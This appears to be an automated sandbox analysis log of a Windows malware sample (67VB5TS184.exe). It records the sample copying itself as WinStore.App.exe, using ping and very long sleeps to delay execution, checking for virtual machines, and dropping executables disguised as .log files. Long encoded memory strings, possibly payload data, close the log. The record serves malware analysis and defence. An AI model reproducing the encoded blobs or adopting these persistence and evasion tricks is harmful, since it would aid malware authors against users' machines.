Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\67VB5TS184.exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Memory allocated: 1B000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1ABA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1A9B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1190000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1ABF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: EB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1AB20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1470000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1AF40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 11A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1AD30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1490000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1AE60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: BD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1A640000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 13B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1AEF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 17A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Memory allocated: 1B2F0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe

Code function: 6_2_00007FF84932C959 sldt word ptr [eax]

6_2_00007FF84932C959

Source: C:\Users\user\Desktop\67VB5TS184.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wOaGdxSj.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DTgFmlup.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dwnaKsIT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\krQkZgRp.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RhNXkKhf.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zssgqxCT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MpypukBp.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RpfWQkOw.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jwizTxuZ.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WQhnzdgR.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qdPghqvM.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YxKDZEBV.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DhBojCdn.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xevZNWFO.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\whTRrWrT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uajAJJWW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EDFigHLC.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OlLEhJlc.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nfGqtVNB.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MhOXPBbk.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rRFIZzDC.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LPiGkDiH.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TzBXQCtx.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pAmkddqh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HGMGgHJP.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FgXXGzqG.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\inwSqFnU.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YEdCGdin.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EVFwVPZl.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OJgNpsGn.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GJkyKHuU.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ybRYxLPz.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wYfqbcKE.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dWzlEqNV.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JTcevqgv.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BJKEmTPo.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kdUIYmJG.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iKDhQNdY.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UtqvUxyo.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wQvXwsjz.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UHGUfCbd.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RwkTfkwc.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PetFAjEL.log	Jump to dropped file
Source: C:\Users\user\Desktop\67VB5TS184.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VtdtDXyC.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IJkognUh.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DdlpkQmL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JNwXPUdL.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zNBzlFlK.log	Jump to dropped file

Source: C:\Users\user\Desktop\67VB5TS184.exe TID: 5812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 5660	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 4404	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 5768	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 6444	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 2260	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 4404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 5804	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 4304	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 5792	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 7136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 3780	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 4144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 3424	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 1888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 5804	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 4768	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 5052	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 6420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 4984	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe TID: 3440	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\67VB5TS184.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\67VB5TS184.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: WinStore.App.exe, 0000003A.00000002.3338337820.0000000013343000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: WinStore.App.exe, 00000006.00000002.2159929623.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: WinStore.App.exe, 0000003A.00000002.3338337820.000000001350B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0Y8Fr80PXLx6lXR1RBT+NNLh1b2N+3a2Lq1tXekf+2y5hFqEu/PNSnucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
